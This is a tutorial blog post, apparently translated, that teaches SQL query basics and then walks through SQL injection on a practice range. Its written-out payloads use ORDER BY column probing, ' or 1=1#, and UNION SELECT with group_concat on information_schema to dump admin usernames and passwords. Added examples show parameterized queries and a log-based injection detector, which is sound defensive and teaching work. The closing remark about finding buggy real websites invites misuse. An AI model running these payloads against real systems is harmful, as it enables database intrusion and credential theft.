“This is the 24th day of my participation in the First Challenge 2022. For details: First Challenge 2022”
Preface
This article was written on CSDN and moved over to Juejin; it is also one of the posts in the SQL series. If you have read the summary of SQL database operations first, this one will go very smoothly. Database security has always been a concern for those of us doing web development, especially when playing with security; sqlmap, that old rascal, is no joke. Of course, current frameworks do a lot of the defending for you, so major problems are unlikely. Django, for example, ships with a built-in module against SQL injection. Apart from the odd individual, or a PHP site that has been maintained for ages, you won't see too many serious problems. Basically, as I said today (Monday), I remember a year ago, while brushing through practice sites like the "Spring and Autumn" platform, finding one with an unlimited phone verification code. That has nothing to do with SQL, of course: they simply had not set a refresh interval for the phone verification code, and the answer to the image captcha could be found in the web page. With that, you could write a crawler and harass someone with messages; I think it's gone now.
For those without the basics, please take a detour first: Basic Use of MariaDB (one article covers the basic operations). MariaDB and MySQL operations are basically the same; the difference today is that one is open source and the other is not. A joke: the whole world can be injected, except your heart. (Subtext: you do not belong to the set of the whole world. Suppose you belong to the set of human beings, and human beings belong to the set of the world; since you do not belong to the set of the world, you do not belong to the set of human beings. Conclusion: you are not a person!!)
Conditional queries
First, let's look at the table we will use. A conditional query is essentially adding a WHERE clause; here are some examples. Say we want to extract Xiao Ming:
```sql
select * from hello where id=1;
select * from hello where name="Xiao Ming";
select * from hello where name="Xiao Ming" or id=1;
select * from hello where id=1 and age=15;
```
Ordering the results
ORDER BY sorts the result; add DESC for descending order. Without ORDER BY you get the default order.
```sql
select * from hello;
# select * from hello order by id desc;
```
But that's not the point. This is:
```sql
select * from hello order by 1;
select * from hello order by 3;
```
Compare the two results carefully and you will find that they are the same as
```sql
select * from hello order by id;
select * from hello order by age;
```
So ORDER BY 1 and ORDER BY id are equivalent: the number refers to the column position in the result. This is useful not just for sorting; in injection it is used to find out how many fields a query returns, because ordering by a column position higher than the field count produces an error. For example, the hello table has three columns, so ORDER BY 3 works but ORDER BY 4 fails.
LIMIT: limiting the result
LIMIT x,y: x is the offset (where to start, counting from 0) and y is how many rows to take from x. For example, limit 0,2 takes the first and second rows, so limit 1,2 takes the second and third rows.
Union queries
Let's take an example of extracting names and ages with a union query.
```sql
select name from hello union select age from hello;
```
This concatenates two different result sets. Two points to note: first, the two parts of a union can query two different tables. Second, the two results of a union query must have the same number of columns. Here's an example:
Now notice one more result:
Misaligned display
First we need to know the number of fields returned by the first half of the query, because the columns of the second half are lined up under the column headers of the first half. What does that look like? Look at the following example and its result.
SQL built-in functions
View the database name
```sql
select database();
```
The current user and the version are viewed the same way, with the user() and version() functions. Back to the summary.
MySQL's own database and tables
This is MySQL's own database, which mainly stores information about tables, databases and users. It is very important, because it is basically the entry point for penetration injection: getting the database's users and passwords, and relating tables to their schemas through tables such as information_schema.tables. Here's an example:
mycli, an auxiliary tool
This is a nice tool written in Python that gives you command prompts (completion) to make things easier.
SQL injection types
SQL injection is divided into two kinds: integer (numeric) injection and character (string) injection. The difference between them, and why they are separated at all, really comes down to the query statement. In a URL, the typical "?id=1" part is combined with the backend's data access to generate a query, for example:
https://hello.com?id=5
Say this is the URL of a page switch. The SQL query might be
```sql
select html_view from html_views where id = 5
```
This is the integer type, or
```sql
select html_view from html_views where id = '5'
```
This is the character type.
Now let's try 1 plus 1. Obviously this page treats the id as a character: if it were an integer, 1+1 would be 2 and the page for id 2 would be returned. Now try taking all of the data. This is a low-level range, so there is no filtering; just inject it. The resulting statement is roughly
```sql
select * from table where id=' ' or 1=1#';
```
which is just equivalent to selecting everything. Also, this is not blind injection: there are obvious hints, so it is a relatively basic range. Just watch the fun; this example focuses on the injection types.
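The integer-versus-character distinction above, the 1+1 test, and the parameterized fix that frameworks like Django apply, as an added example that is not part of the original post. It uses an in-memory SQLite stand-in for MySQL with a constructed hello table (SQLite's comment marker is `--`, where the post's MySQL payload ends with `#`).

```python
import sqlite3

# Constructed sample data, same shape as the post's `hello` table.
ROWS = [(1, "Xiao Ming", 15), (2, "Xiao Hong", 16), (3, "Xiao Gang", 17)]


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("create table hello (id integer, name text, age integer)")
    con.executemany("insert into hello values (?, ?, ?)", ROWS)
    return con


def lookup_integer_vuln(con, user_id):
    # Integer-type query built by concatenation: id = 5 (no quotes).
    return con.execute(f"select id, name from hello where id={user_id}").fetchall()


def lookup_character_vuln(con, user_id):
    # Character-type query built by concatenation: id = '5' (quoted).
    return con.execute(f"select id, name from hello where id='{user_id}'").fetchall()


def lookup_safe(con, user_id):
    # Parameterized query: the driver binds the value as data, never as SQL.
    return con.execute("select id, name from hello where id=?", (user_id,)).fetchall()


def demo():
    con = make_db()
    # The post's `' or 1=1#` payload, written with SQLite's `--` comment.
    payload = "' or 1=1 --"
    return {
        "integer_plus": lookup_integer_vuln(con, "1+1"),      # arithmetic runs: row 2
        "character_plus": lookup_character_vuln(con, "1+1"),  # literal '1+1': nothing
        "vuln_payload": lookup_character_vuln(con, payload),  # every row leaks
        "safe_payload": lookup_safe(con, payload),            # nothing matches
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```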
Hands-on: the practice range
This time we use a practice range. It is a classic example in which we get the administrator password.
Determine whether there is an injection point, and of what type
In fact the id parameter is the injection point; what matters is which type the id is. For character injection you have to append a #.
Let's see how many fields it has
This is trial and error. 3 does not work, so the guess is two.
Query the database name
What's the play? Watch this. So we get the database name.
Get the table names
This is just a look. Let me make it clear; remember that earlier statement:
```sql
union select table_name from information_schema.tables where table_schema='huterox';
```
I'm going to introduce a function called group_concat(), which concatenates all the values of a field into one string.
```sql
union select table_name from information_schema.tables where table_schema='maoshe';
```
We query information_schema.tables for the table names whose schema is maoshe, and we need all of the values concatenated to know which tables it contains. So:
```sql
union select group_concat(table_name) from information_schema.tables where table_schema='maoshe'
```
Enumerate the field names
A blind guess: the admin table has what I want. Let's see what is inside the admin table.
```sql
union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'#
```
Obtain the password: view the value of the password field
```sql
union select 1,group_concat(username,":",password) from maoshe.admin
```
Conclusion
1. Guess how many fields there are.
2. Know some of MySQL's built-in databases, such as where the tables are recorded.
3. Be lucky enough to find a buggy website (outside of practice ranges).
Most important: know which table in the database is the user table (by guessing), and which fields in that user table hold the values to retrieve.
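From the defender's side, the walkthrough above (ORDER BY n probing, then UNION SELECT against information_schema with group_concat) is also a recognisable sequence in web server logs. The detector below is an added example, not part of the original post; the access-log lines, client addresses and probing threshold are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed Apache combined-format samples; 10.0.0.9 runs the post's sequence.
LOG_LINES = [
    '10.0.0.9 - - [01/Jan/2022:10:00:01 +0000] "GET /view?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2022:10:00:02 +0000] "GET /view?id=1%20order%20by%201 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2022:10:00:03 +0000] "GET /view?id=1%20order%20by%202 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2022:10:00:04 +0000] "GET /view?id=1%20order%20by%203 HTTP/1.1" 500 201',
    '10.0.0.9 - - [01/Jan/2022:10:00:05 +0000] "GET /view?id=-1%20union%20select%201,group_concat(table_name)%20from%20information_schema.tables HTTP/1.1" 200 640',
    '10.0.0.7 - - [01/Jan/2022:10:00:06 +0000] "GET /view?id=2 HTTP/1.1" 200 498',
]

REQ_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+)')
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\b", re.I),
    "group_concat": re.compile(r"\bgroup_concat\s*\(", re.I),
}
ORDER_BY_N = re.compile(r"\border\s+by\s+(\d+)\b", re.I)
PROBE_THRESHOLD = 3  # distinct ORDER BY positions from one client (assumed value)


def analyze(lines, threshold=PROBE_THRESHOLD):
    """Return (client_ip, finding) tuples in order of appearance."""
    findings = []
    order_by_seen = defaultdict(set)
    for line in lines:
        m = REQ_RE.match(line)
        if not m:
            continue  # malformed line: skip it rather than crash the detector
        ip, target = m.group(1), unquote_plus(m.group(2))  # decode %20 etc.
        for name, rx in SIGNATURES.items():
            if rx.search(target):
                findings.append((ip, name))
        n = ORDER_BY_N.search(target)
        if n:
            order_by_seen[ip].add(int(n.group(1)))
            if len(order_by_seen[ip]) == threshold:  # fire once per client
                findings.append((ip, "order_by_column_probing"))
    return findings


if __name__ == "__main__":
    for ip, finding in analyze(LOG_LINES):
        print(ip, finding)
```

A single ORDER BY is normal traffic; the column-count probe is only flagged once a client has tried several distinct positions, which is why the threshold is tracked per client.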